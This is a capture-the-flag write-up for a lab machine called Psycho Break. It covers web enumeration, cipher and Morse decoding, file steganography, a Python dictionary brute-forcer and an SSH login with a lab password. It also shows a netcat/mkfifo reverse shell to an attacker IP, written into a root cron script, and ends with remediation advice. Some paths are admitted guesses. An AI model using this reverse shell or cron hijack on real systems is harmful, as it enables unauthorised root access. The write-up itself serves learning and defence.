Target IP: psychobreak.thm (Requires /etc/hosts entry) Difficulty: Medium Objective: User (joseph) & Root (root.txt) Flags

1. Executive Summary

“Psycho Break” is a Linux machine themed around a mental hospital. Initial access is a multi-stage puzzle involving web enumeration to find cipher keys, OSINT to locate physical locations (St. Augustine Lighthouse), and audio steganography (Morse code). Credentials for SSH are recovered by brute-forcing a custom Python locking script using a provided dictionary. Privilege escalation is achieved by exploiting a user-writable Python script executed by a system Cron Job.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Nmap and Web directory fuzzing.
  • T1027 (Obfuscated Files or Information): Decoding Atbash, Morse Code, and hidden Zip archives.
  • T1110 (Brute Force): Scripting a custom brute-forcer for a Python checker.
  • T1053 (Scheduled Task/Job): Exploiting a Python cron job for Root RCE.

2. Operational Setup

Host Configuration

echo "10.10.x.x psychobreak.thm" | sudo tee -a /etc/hosts

3. Enumeration

A. Network Scanning

Your scan revealed standard ports:

  • 21/tcp (FTP): ProFTPD 1.3.5a.
  • 22/tcp (SSH): OpenSSH.
  • 80/tcp (HTTP): Apache.

B. Web Enumeration (The Puzzle)

  1. Source Code: Viewing the source of the main page revealed /sadistRoom.
  • Key Found: 532219a04ab7a02b56faafbec1a4c1ea.
  1. Locker Room: Using the key to access /lockerRoom.
  • Cipher: Tizmg_nv_zxxvhh_gl_gsv_nzk_kovzhv
  • Decoding: This is Atbash (A=Z, B=Y).
  • Result: Grant_me_access_to_the_map_please.
  1. The Map: Accessing the map reveals /SafeHeaven and /abandonedRoom.

C. OSINT (The Keeper)

Fuzzing /SafeHeaven revealed /keeper.

  • Challenge: “Where is the Lighthouse?”
  • Clue: The image or text likely referenced The Evil Within lore or visual cues.
  • Solution: St. Augustine Lighthouse.
  • Keeper Key: 48ee41458eb0b43bf82b986cecf3af01.

4. Initial Access: The Media Hunt

A. FTP & Morse Code

Using the keys found, you accessed the FTP server.

  • File: key.wav.
  • Analysis: The audio contains Morse Code.
  • Tool: Morse Code Adaptive Decoder.
  • Result: A password (likely used for the Zip file later).

B. Steganography (The “Table”)

You downloaded helpme.zip and extracted Table.jpg.

  • Forensics: file Table.jpg reveals it is actually a Zip archive (Zip headers PK detected).
mv Table.jpg Table.zip
unzip Table.zip
  • Contents: Joseph_Oda.jpg and key.wav (again).

C. The Brute Force (Dictionary & Checker)

You mentioned a “dictionary and checker file.” This is the pivotal step.

  • Files: Typically random.py (the lock) and dict.txt (the keys).
  • Goal: The script checks if a password is correct. You wrote a wrapper to try every word in dict.txt against the python script.

Python Brute-Forcer Logic:

import subprocess
 
with open("dict.txt", "r") as f:
    for line in f:
        password = line.strip()
        # Run the checker script with the password
        try:
            output = subprocess.check_output(["python3", "program.py", password], stderr=subprocess.STDOUT)
            if b"Success" in output: # Or whatever success message it gives
                print(f"Found Password: {password}")
                break
        except:
            continue

D. SSH Login

Using the password recovered from the brute force (or the thankyou.txt found inside the Stego image Joseph_Oda.jpg using that password):

  • User: joseph
  • Password: intotheterror445
ssh joseph@psychobreak.thm

User Flag: Found in joseph’s home directory.


5. Privilege Escalation: Cron Job

A. Enumeration

We check for running processes or scheduled tasks.

crontab -l
# or
cat /etc/crontab

Finding: A cron job runs a Python script (likely the_plan.py or similar) as root regularly.

B. The Vulnerability

We check permissions on the script.

ls -la /path/to/script.py
# -rw-rw-r-- 1 root joseph ... script.py

Critical Flaw: The user joseph has Write access to the file. We can overwrite it with malicious code.

C. Exploitation (Python Reverse Shell)

We overwrite the script with the payload you used.

echo 'import os; os.system("mkfifo /tmp/f; nc 10.10.YOUR.IP 4444 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f")' > script.py

D. Execution

  1. Start listener: nc -lvnp 4444.
  2. Wait for the cron job to trigger.
  3. Root Shell.

Root Flag: /root/root.txt.


6. Remediation (Blue Team)

  1. File Extensions: Ensure file validation checks the actual file headers (Magic Bytes), not just the extension. Table.jpg being a Zip file should be detected.
  2. Information Leakage:
  • Remove source code comments revealing hidden paths (/sadistRoom).
  • Do not hide credentials in audio files or images; this is “Security by Obscurity.”
  1. Cron Job Permissions:
  • Scripts executed by root must be writable only by root.
  • Fix: chown root:root script.py and chmod 700 script.py.